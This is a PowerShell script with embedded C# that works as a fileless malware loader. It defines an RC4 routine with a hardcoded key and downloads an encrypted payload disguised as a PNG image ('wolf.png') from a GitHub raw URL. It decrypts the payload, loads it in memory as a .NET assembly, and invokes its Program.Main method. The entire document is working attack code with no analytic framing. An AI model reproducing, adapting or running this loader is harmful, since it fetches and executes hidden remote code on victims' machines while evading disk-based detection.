Add-type -Assembly System.Drawing
Add-Type -Assembly System.Windows.Forms
Add-Type -Assembly PresentationCore
Add-Type -AssemblyName System.Windows.Forms
Add-type -AssemblyName System.Drawing
Add-Type -TypeDefinition @"
#pragma warning disable 0675
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace BrainS
{
    public class RC4EncDec
    {
        private static int nBlockLength = 256;
        private readonly static string strKey = "/ie#psz58we365/-*g/fd*b/89fg8b2f-g/+edg-*fhkynuy8,ui1,j@h62k9jfghj#+hj-f*hj/k9m45fh96f6%94h+9s7f4gh!s8/h/h-*-/j9j87*7hmn84ytmn7yt-ty*n*n/yrkjyulop*told*f-a/sdfs*io-lu*ilo*-i]*[-*opi[;l*uiliu;(837Ywl;dfs+dfdgju*uk*iuds*d-fsdf+sdfsd+fhgt*ju*-o98o98-*p09*9*08;9*08lo8,*.*,.o.**,ertyhsrgh*-fgagfa+sfasqwfeffsdfsdfsdsvdvfvar/g*fvvw*-34*34g23g*45+erg+ga+dfgas+fag2hgadfgag*ag*-g*4g*45t56*h*65hggagargsgg-*dfgfdg*-fgfgfg+dgfdfgd*d*ga+f*a-sdf*sdf*-saAF2AFGSgfg*GDGGFbgddfgsgfdffdf+gdfgdgdg+dfgsdgsd+sdsgfa*-gs+ggf+ff+ffdg";
        private static byte[] abIV_Table = new byte[nBlockLength];

        public static void GenerateIV()
        {
            int j = 0;
            for (int i = 0; i < nBlockLength; i++)
            {
                abIV_Table[i] = (byte)i;
            }
            for (int i = 0; i < nBlockLength; i++)
            {
                j = (j + abIV_Table[i] + strKey[i]) % nBlockLength;
                byte bTemp = abIV_Table[i];
                abIV_Table[i] = abIV_Table[j];
                abIV_Table[j] = bTemp;
            }
        }

        public static byte[] Generate_Enc_Dec(byte[] abPlain)
        {
			GenerateIV();
	         int i = 0, j = 0;
	         byte[] abTempTable = new byte[nBlockLength];
             byte[] abData = new byte[abPlain.Length];
             Buffer.BlockCopy(abIV_Table, 0, abTempTable, 0, nBlockLength);	         
	         for (int t = 0; t < abPlain.Length; t ++)
	         {
		         j = (j + abTempTable[i]) % nBlockLength;
		         byte bTemp = abTempTable[i];
		         abTempTable[i] = abTempTable[j];
		         abTempTable[j] = bTemp;
		         byte bRandKey = abTempTable[(abTempTable[i] + abTempTable[j]) % nBlockLength];
		         abPlain[t] ^= bRandKey;
		         i = (++ i) % nBlockLength;
	         }
             abData = abPlain;
             return abData;
        }
    }
}
"@ -ReferencedAssemblies System.Windows.Forms
$findStr = "Main";
$storeURI = "https://raw.githubusercontent.com/shantez441/EDGTy/refs/heads/main/wolf.png"
$recvData = Invoke-WebRequest -Method GET -Uri $storeURI -UseBasicParsing
[byte[]]$bytes = $recvData.content
$recvLeng = $bytes.Length
$decrypt_Bytes = [BrainS.RC4EncDec]::Generate_Enc_Dec($bytes)
$assembly = [System.Reflection.Assembly]::Load($decrypt_Bytes)
foreach ($type in $assembly.GetTypes())
{
	if(($type.Name.ToLower()).equals("program"))
	{
		foreach ($functionname in $type.GetMethods())
		{
			if(($functionname.Name.ToLower()).equals($findStr.ToLower()))
			{
				$instance = [System.Activator]::CreateInstance($type)
				$functionname.Invoke($instance,@())
			}
		}
	}

}
